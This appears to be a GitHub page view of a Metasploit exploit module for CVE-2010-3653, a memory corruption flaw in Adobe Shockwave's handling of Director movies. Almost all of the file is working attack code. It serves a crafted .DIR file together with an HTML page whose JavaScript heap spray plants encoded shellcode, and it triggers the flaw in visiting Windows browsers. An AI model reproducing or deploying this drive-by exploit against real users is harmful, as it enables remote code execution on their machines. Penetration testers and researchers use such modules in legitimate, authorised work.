-
Notifications
You must be signed in to change notification settings - Fork 13.9k
/
adobe_shockwave_rcsl_corruption.rb
132 lines (114 loc) · 4.1 KB
/
adobe_shockwave_rcsl_corruption.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Shockwave rcsL Memory Corruption',
'Description' => %q{
This module exploits a weakness in the Adobe Shockwave player's handling of
Director movies (.DIR). A memory corruption vulnerability occurs through an undocumented
rcsL chunk. This vulnerability was discovered by http://www.abysssec.com.
},
'License' => MSF_LICENSE,
'Author' => [ 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>'],
'References' =>
[
[ 'CVE', '2010-3653'],
[ 'OSVDB', '68803'],
[ 'URL', 'http://www.exploit-db.com/sploits/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip' ],
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-25.html' ]
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { 'Ret' => 0x0a0a0a0a } ], # tested on XP SP2 and XP SP3
],
'DisclosureDate' => 'Oct 21 2010',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
#
# When exploit is called, load the exploit.dir file
#
def exploit
path = File.join( Msf::Config.data_directory, "exploits", "shockwave_rcsl.dir" )
fd = File.open( path, "rb" )
@dir_data = fd.read(fd.stat.size)
fd.close
super
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Randomize some things
dirname = get_resource() + "/" + rand_text_alpha(rand(20))
shellcode_rand = rand_text_alpha(rand(20))
# payload encoding
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# build the exploit
content = <<-EOS
<html>
<head>
<title>msf</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script>
#{shellcode_rand} = unescape('#{shellcode}');
nops=unescape('%u0a0a%u0a0a');
headersize =20;
slackspace= headersize + #{shellcode_rand}.length;
while(nops.length< slackspace) nops+= nops;
fillblock= nops.substring(0, slackspace);
block= nops.substring(0, nops.length- slackspace);
while( block.length+ slackspace<0x200000) block= block+ block+ fillblock;
memory=new Array();
for( counter=0; counter<200; counter++) memory[counter]= block + #{shellcode_rand};
</script>
</head>
<body bgColor="#FFFFFF">
<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258"
codebase="http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab#version=11,5,0,593"
ID=Abysssec width=600 height=430 VIEWASTEXT>
<param name=src value="#{dirname}.DIR">
<param name=swRemote value="swSaveEnabled='true' swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' ">
<param name=swStretchStyle value=fill>
<param name=PlayerVersion value=11>
<PARAM NAME=bgColor VALUE=#FFFFFF>
<embed src="#{dirname}.DIR" bgColor=#FFFFFF width=600 height=430 swRemote="swSaveEnabled='true' swVolume='true' swRestart='true'
swPausePlay='true' swFastForward='true' swContextMenu='true' " swStretchStyle=fill
type="application/x-director" PlayerVersion=11 pluginspage="http://www.macromedia.com/shockwave/download/"></embed>
</object>
</body>
</html>
EOS
# Transmit the response to the client
path = request.uri
if (path =~ /\.DIR/i)
print_status("Sending exploit DIR")
send_response(cli, @dir_data, { 'Content-Type' => 'application/octet-stream' })
else
print_status("Sending HTML")
send_response_html(cli, content)
end
# Handle the payload
handler(cli)
end
end